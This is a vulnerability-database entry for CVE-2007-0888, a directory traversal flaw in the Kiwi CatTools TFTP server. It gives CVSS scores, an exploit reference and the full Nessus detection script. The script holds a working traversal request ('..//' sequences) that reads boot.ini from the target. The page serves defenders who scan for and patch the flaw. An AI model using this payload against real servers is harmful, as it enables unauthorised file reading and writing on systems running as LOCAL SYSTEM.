Vulnerabilities > CVE-2007-0888 - Directory Traversal vulnerability in Kiwi CatTools TFTP

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
kiwi-enterprises
critical
nessus
exploit available

Summary

Directory traversal vulnerability in the TFTP server in Kiwi CatTools before 3.2.0 beta allows remote attackers to read arbitrary files, and upload files to arbitrary locations, via ..// (dot dot) sequences in the pathname argument to an FTP (1) GET or (2) PUT command. This vulnerability is addressed in the following product update: Kiwi Enterprises, Kiwi CatTools, 3.2.0 Beta

Vulnerable Configurations

Part Description Count
Application
Kiwi_Enterprises
1

Exploit-Db

descriptionKiwi CatTools TFTP <= 3.2.8 Remote Path Traversal Vulnerability. CVE-2007-0888. Remote exploit for windows platform
idEDB-ID:3380
last seen2016-01-31
modified2007-02-27
published2007-02-27
reporterSergey Gordeychik
sourcehttps://www.exploit-db.com/download/3380/
titleKiwi CatTools TFTP <= 3.2.8 - Remote Path Traversal Vulnerability

Nessus

NASL familyMisc.
NASL idKIWI_CATTOOLS_TFTPD_DIR_TRAVERSAL.NASL
descriptionThe remote host appears to be running Kiwi CatTools, a freeware application for device configuration management. The TFTP server included with the version of Kiwi CatTools installed on the remote host fails to sanitize filenames of directory traversal sequences. An attacker can exploit this issue to get or put arbitrary files on the affected host subject to the privileges of the user id under which the server operates, LOCAL SYSTEM by default.
last seen2020-06-01
modified2020-06-02
plugin id24747
published2007-03-01
reporterThis script is Copyright (C) 2007-2018 Ferdy Riphagen
sourcehttps://www.tenable.com/plugins/nessus/24747
titleKiwi CatTools < 3.2.9 TFTP Server Traversal Arbitrary File Manipulation
code
#
# Script Written By Ferdy Riphagen 
# Script distributed under the GNU GPLv2 License.
#

# Changes by Tenable: 
# - re-did the description, raised the risk (1/23/09)
# - Revised plugin title, family change (9/5/09)

include("compat.inc");

if (description) {
 script_id(24747); 
 script_version("1.18");
 script_cve_id("CVE-2007-0888");
 script_bugtraq_id(22490);

 script_name(english:"Kiwi CatTools < 3.2.9 TFTP Server Traversal Arbitrary File Manipulation");

 script_set_attribute(attribute:"synopsis", value:
"The remote TFTP server is affected by a directory traversal
vulnerability." );
 script_set_attribute(attribute:"description", value:
"The remote host appears to be running Kiwi CatTools, a freeware
application for device configuration management. 

The TFTP server included with the version of Kiwi CatTools installed
on the remote host fails to sanitize filenames of directory traversal
sequences.  An attacker can exploit this issue to get or put arbitrary
files on the affected host subject to the privileges of the user id
under which the server operates, LOCAL SYSTEM by default." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/459500/30/0/threaded" );
 script_set_attribute(attribute:"see_also", value:"http://www.kiwisyslog.com/kb/idx/5/178/article/" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to Kiwi CatTools version 3.2.9 or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploithub_sku", value:"EH-13-903");
  script_set_attribute(attribute:"exploit_framework_exploithub", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2007/03/01");
 script_set_attribute(attribute:"vuln_publication_date", value: "2007/02/09");
 script_cvs_date("Date: 2018/11/15 20:50:23");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

 script_summary(english:"Try to grab a file outside the tftp root");
 script_category(ACT_ATTACK);
 script_family(english:"Misc.");
 script_copyright(english:"This script is Copyright (C) 2007-2018 Ferdy Riphagen");
 script_dependencies("tftpd_detect.nasl", "tftpd_backdoor.nasl");
 script_require_keys("Services/udp/tftp");
 script_exclude_keys('tftp/backdoor');	# Not wise but quicker
 exit(0);
}

include("tftp.inc");

port = get_kb_item("Services/udp/tftp");
if (!port) port = 69;
if (get_kb_item('tftp/'+port+'/backdoor')) exit(0);

get = tftp_get(port:port, path:"z//..//..//..//..//..//boot.ini");
if (isnull(get)) exit(0);
# In case the backdoor was missed by tftpd_backdoor.nasl (UDP is not reliable)
tftp_ms_backdoor(file: 'boot.ini', data: get, port: port);

if (
    ("ECHO" >< get)                || ("SET " >< get)             ||
    ("export" >< get)              || ("EXPORT" >< get)           ||
    ("mode" >< get)                || ("MODE" >< get)             || 
    ("doskey" >< get)              || ("DOSKEY" >< get)           ||
    ("[boot loader]" >< get)       || ("[fonts]" >< get)          ||
    ("[extensions]" >< get)        || ("[mci extensions]" >< get) ||
    ("[files]" >< get)             || ("[Mail]" >< get)           ||
    ("[operating systems]" >< get)
)
{
    report = 
"Here are the contents of the file '\boot.ini' that Nessus
was able to read from the remote host :
" + get;
    security_hole(port:port, protocol:"udp", extra:report);
}